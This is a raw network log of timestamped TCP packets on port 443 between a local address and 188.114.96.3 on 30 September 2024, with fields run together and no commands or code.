                                                                                                                                                                                                    Sep 30, 2024 18:25:29.784737110 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.785969019 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.785988092 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786042929 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786048889 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786079884 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786427975 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786442995 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786475897 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786482096 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786504984 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.786524057 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.787822962 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.787837982 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.787892103 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.787898064 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.787935972 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.788753033 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.788768053 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.788836956 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.788842916 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.788877964 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789570093 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789585114 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789638996 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789644003 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789671898 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789691925 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789874077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789891005 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789930105 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789935112 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789967060 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.789984941 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.871305943 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.871329069 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.871401072 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.871417046 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.871462107 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.872487068 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.872530937 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.872567892 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.872579098 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.872603893 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.872621059 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.873672009 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.873691082 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.873733997 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.873742104 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.873764992 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.873785019 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.874214888 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.874228954 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.874278069 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.874284029 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.874321938 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.875416040 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.875432014 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.875489950 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.875499010 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.875535011 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.876547098 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.876563072 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.876643896 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.876652002 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.876702070 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877067089 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877080917 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877134085 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877145052 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877218008 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877218008 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877418995 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877433062 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877459049 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877466917 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877496004 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.877516985 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962657928 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962686062 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962753057 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962800980 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962822914 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962836981 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962843895 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962858915 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962876081 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962882042 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.962910891 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.965747118 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.965768099 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.965818882 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.965826988 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966020107 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966038942 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966073990 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966079950 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966106892 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966274977 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966290951 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966351986 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966356993 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966372967 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966784954 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966841936 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.966846943 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.967031002 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.967086077 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.967091084 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.968291044 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.968305111 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.968352079 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.968358040 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:29.968394995 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.049288034 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.049312115 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.049377918 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.049398899 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.049443960 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.050193071 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.050208092 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.050263882 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.050271034 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.050309896 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051218033 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051230907 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051281929 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051289082 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051326036 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051840067 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051856995 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051915884 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051923037 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.051959038 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052283049 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052299023 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052347898 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052355051 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052393913 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052687883 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052702904 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052747011 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052755117 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.052793026 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053062916 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053077936 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053122044 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053129911 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053167105 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053514004 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053529024 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053577900 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053584099 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.053622961 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.137379885 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.137408018 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.137468100 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.137490034 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.137516022 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.137542009 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.138195038 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.138212919 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.138268948 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.138274908 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.138317108 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139240980 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139259100 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139421940 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139429092 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139472008 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139700890 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139715910 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139770031 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139775991 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.139816046 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140132904 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140147924 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140203953 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140212059 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140255928 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140600920 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140615940 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140675068 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140681028 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.140717983 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141000032 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141016006 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141115904 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141122103 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141160965 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141521931 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141537905 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141597986 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141603947 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.141648054 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.225116968 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.225147009 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.225191116 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.225213051 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.225229979 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.225241899 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.226511002 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.226528883 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.226583004 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.226588964 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.226624966 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.226965904 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.226980925 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227030993 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227035999 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227070093 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227359056 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227374077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227422953 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227427959 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227463007 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227914095 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227930069 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227982998 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.227988958 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228024006 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228296041 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228313923 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228358030 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228363991 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228385925 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228405952 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228760004 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228775978 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228833914 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228837967 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.228877068 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.229329109 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.229348898 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.229403973 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.229409933 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.229530096 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314229012 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314256907 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314313889 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314328909 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314351082 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314368963 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314711094 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314728975 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314759016 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314764977 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314790964 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.314809084 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315279007 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315296888 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315330029 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315335035 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315355062 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315373898 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315803051 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315818071 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315854073 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315860033 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315880060 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.315901041 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.316416025 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.316431046 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.316468954 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.316474915 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.316494942 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.316517115 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317217112 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317234993 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317269087 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317276001 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317296982 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317320108 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317785025 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317799091 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317832947 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317838907 CEST44349706188.114.96.3192.168.2.8
